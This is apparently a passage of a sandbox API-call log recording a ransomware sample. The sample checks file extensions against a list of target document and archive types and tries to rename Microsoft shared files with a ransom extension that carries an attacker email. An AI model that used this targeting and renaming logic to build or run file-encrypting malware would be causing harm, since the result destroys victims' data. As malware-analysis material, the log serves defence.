(lpString1=".xls", lpString2=".dll") returned 1 [0296.814] lstrlenW (lpString=".xlsx") returned 5 [0296.814] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0296.814] lstrlenW (lpString=".ppt") returned 4 [0296.814] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.814] lstrlenW (lpString=".zip") returned 4 [0296.814] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.814] lstrlenW (lpString=".rar") returned 4 [0296.814] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.814] lstrlenW (lpString=".bz2") returned 4 [0296.814] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.814] lstrlenW (lpString=".7z") returned 3 [0296.814] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.814] lstrlenW (lpString=".dbf") returned 4 [0296.814] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.815] lstrlenW (lpString=".1cd") returned 4 [0296.815] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.815] lstrlenW (lpString=".jpg") returned 4 [0296.815] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.815] lstrlenW (lpString=".doc") returned 4 [0296.815] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.815] lstrlenW (lpString=".docx") returned 5 [0296.815] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0296.815] lstrlenW (lpString=".pdf") returned 4 [0296.815] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.815] lstrlenW (lpString=".xls") returned 4 [0296.815] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.815] lstrlenW (lpString=".xlsx") returned 5 [0296.815] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0296.815] lstrlenW (lpString=".ppt") returned 4 [0296.815] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.816] lstrlenW (lpString=".zip") returned 4 [0296.816] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.816] lstrlenW (lpString=".rar") returned 4 [0296.816] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.816] lstrlenW (lpString=".bz2") returned 4 [0296.816] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.816] lstrlenW (lpString=".7z") returned 3 [0296.816] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.816] lstrlenW (lpString=".dbf") returned 4 [0296.816] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.816] lstrlenW (lpString=".1cd") returned 4 [0296.816] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0296.816] lstrlenW (lpString=".jpg") returned 4 [0296.816] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.816] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.816] lstrlenW (lpString="AppVIsvSubsystemController.dll") returned 30 [0296.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.817] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=1402584) returned 1 [0296.817] CloseHandle (hObject=0x480) returned 1 [0296.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll")) returned 0x20 [0296.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.818] lstrlenW (lpString=".doc") returned 4 [0296.818] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.818] lstrlenW (lpString=".docx") returned 5 [0296.818] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0296.818] lstrlenW (lpString=".pdf") returned 4 [0296.818] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.818] lstrlenW (lpString=".xls") returned 4 [0296.818] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.818] lstrlenW (lpString=".xlsx") returned 5 [0296.818] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0296.818] lstrlenW (lpString=".ppt") returned 4 [0296.818] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.818] lstrlenW (lpString=".zip") returned 4 [0296.818] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.818] lstrlenW (lpString=".rar") returned 4 [0296.818] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.818] lstrlenW (lpString=".bz2") returned 4 [0296.818] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.818] lstrlenW (lpString=".7z") returned 3 [0296.818] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.818] lstrlenW (lpString=".dbf") returned 4 [0296.818] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.819] lstrlenW (lpString=".1cd") returned 4 [0296.819] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.819] lstrlenW (lpString=".jpg") returned 4 [0296.819] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.819] lstrlenW (lpString=".doc") returned 4 [0296.819] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.819] lstrlenW (lpString=".docx") returned 5 [0296.819] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0296.819] lstrlenW (lpString=".pdf") returned 4 [0296.819] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.819] lstrlenW (lpString=".xls") returned 4 [0296.819] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.819] lstrlenW (lpString=".xlsx") returned 5 [0296.819] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0296.819] lstrlenW (lpString=".ppt") returned 4 [0296.819] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.819] lstrlenW (lpString=".zip") returned 4 [0296.819] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.819] lstrlenW (lpString=".rar") returned 4 [0296.820] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.820] lstrlenW (lpString=".bz2") returned 4 [0296.820] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.820] lstrlenW (lpString=".7z") returned 3 [0296.820] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.820] lstrlenW (lpString=".dbf") returned 4 [0296.820] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.820] lstrlenW (lpString=".1cd") returned 4 [0296.820] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0296.820] lstrlenW (lpString=".jpg") returned 4 [0296.820] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.820] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.821] lstrlenW (lpString="AppvIsvSubsystems32.dll") returned 23 [0296.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.821] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=1761448) returned 1 [0296.821] CloseHandle (hObject=0x480) returned 1 [0296.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll")) returned 0x20 [0296.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.822] lstrlenW (lpString=".doc") returned 4 [0296.822] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.822] lstrlenW (lpString=".docx") returned 5 [0296.822] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0296.822] lstrlenW (lpString=".pdf") returned 4 [0296.822] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.822] lstrlenW (lpString=".xls") returned 4 [0296.822] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.823] lstrlenW (lpString=".xlsx") returned 5 [0296.823] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0296.823] lstrlenW (lpString=".ppt") returned 4 [0296.823] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.823] lstrlenW (lpString=".zip") returned 4 [0296.823] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.823] lstrlenW (lpString=".rar") returned 4 [0296.823] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.823] lstrlenW (lpString=".bz2") returned 4 [0296.823] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.823] lstrlenW (lpString=".7z") returned 3 [0296.823] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.823] lstrlenW (lpString=".dbf") returned 4 [0296.823] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.823] lstrlenW (lpString=".1cd") returned 4 [0296.823] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.823] lstrlenW (lpString=".jpg") returned 4 [0296.823] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.823] lstrlenW (lpString=".doc") returned 4 [0296.823] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.824] lstrlenW (lpString=".docx") returned 5 [0296.824] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0296.824] lstrlenW (lpString=".pdf") returned 4 [0296.824] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.824] lstrlenW (lpString=".xls") returned 4 [0296.824] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.824] lstrlenW (lpString=".xlsx") returned 5 [0296.824] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0296.824] lstrlenW (lpString=".ppt") returned 4 [0296.824] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.824] lstrlenW (lpString=".zip") returned 4 [0296.824] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.824] lstrlenW (lpString=".rar") returned 4 [0296.824] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.824] lstrlenW (lpString=".bz2") returned 4 [0296.824] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.824] lstrlenW (lpString=".7z") returned 3 [0296.824] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.824] lstrlenW (lpString=".dbf") returned 4 [0296.824] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.824] lstrlenW (lpString=".1cd") returned 4 [0296.824] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0296.824] lstrlenW (lpString=".jpg") returned 4 [0296.824] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.825] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.825] lstrlenW (lpString="AppvIsvSubsystems64.dll") returned 23 [0296.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0296.825] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=2285736) returned 1 [0296.825] CloseHandle (hObject=0x480) returned 1 [0297.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")) returned 0x20 [0297.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.153] lstrlenW (lpString=".doc") returned 4 [0297.153] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0297.153] lstrlenW (lpString=".docx") returned 5 [0297.153] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0297.153] lstrlenW (lpString=".pdf") returned 4 [0297.153] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0297.153] lstrlenW (lpString=".xls") returned 4 [0297.153] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0297.153] lstrlenW (lpString=".xlsx") returned 5 [0297.153] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0297.153] lstrlenW (lpString=".ppt") returned 4 [0297.153] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0297.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.153] lstrlenW (lpString=".zip") returned 4 [0297.154] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0297.154] lstrlenW (lpString=".rar") returned 4 [0297.154] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0297.192] lstrlenW (lpString=".bz2") returned 4 [0297.192] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0297.192] lstrlenW (lpString=".7z") returned 3 [0297.192] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0297.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.192] lstrlenW (lpString=".dbf") returned 4 [0297.217] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0297.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.217] lstrlenW (lpString=".1cd") returned 4 [0297.232] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0297.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.232] lstrlenW (lpString=".jpg") returned 4 [0297.232] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.233] lstrlenW (lpString=".doc") returned 4 [0297.233] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString=".docx") returned 5 [0297.233] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0297.233] lstrlenW (lpString=".pdf") returned 4 [0297.233] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString=".xls") returned 4 [0297.233] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString=".xlsx") returned 5 [0297.233] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0297.233] lstrlenW (lpString=".ppt") returned 4 [0297.233] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.233] lstrlenW (lpString=".zip") returned 4 [0297.233] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString=".rar") returned 4 [0297.233] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0297.233] lstrlenW (lpString=".bz2") returned 4 [0297.233] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0297.233] lstrlenW (lpString=".7z") returned 3 [0297.233] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0297.233] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.233] lstrlenW (lpString=".dbf") returned 4 [0297.234] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0297.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.234] lstrlenW (lpString=".1cd") returned 4 [0297.234] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0297.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0297.234] lstrlenW (lpString=".jpg") returned 4 [0297.234] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0297.234] lstrcmpiW (lpString1=".tlb", lpString2=".MSPLT") returned 1 [0297.234] lstrlenW (lpString="vstoee90.tlb") returned 12 [0297.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.458] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=22680) returned 1 [0297.458] CloseHandle (hObject=0x3d0) returned 1 [0297.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 0x20 [0297.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.458] lstrlenW (lpString=".doc") returned 4 [0297.458] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString=".docx") returned 5 [0297.459] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0297.459] lstrlenW (lpString=".pdf") returned 4 [0297.459] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString=".xls") returned 4 [0297.459] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.459] lstrlenW (lpString=".xlsx") returned 5 [0297.459] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0297.459] lstrlenW (lpString=".ppt") returned 4 [0297.459] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.459] lstrlenW (lpString=".zip") returned 4 [0297.459] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.459] lstrlenW (lpString=".rar") returned 4 [0297.459] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString=".bz2") returned 4 [0297.459] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString=".7z") returned 3 [0297.459] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.459] lstrlenW (lpString=".dbf") returned 4 [0297.459] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.459] lstrlenW (lpString=".1cd") returned 4 [0297.459] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0297.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.459] lstrlenW (lpString=".jpg") returned 4 [0297.459] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0297.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0297.460] lstrlenW (lpString=".doc") returned 4 [0297.460] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.460] lstrlenW (lpString=".docx") returned 5 [0297.460] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0297.460] lstrlenW (lpString=".pdf") returned 4 [0297.460] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0297.460] lstrlenW 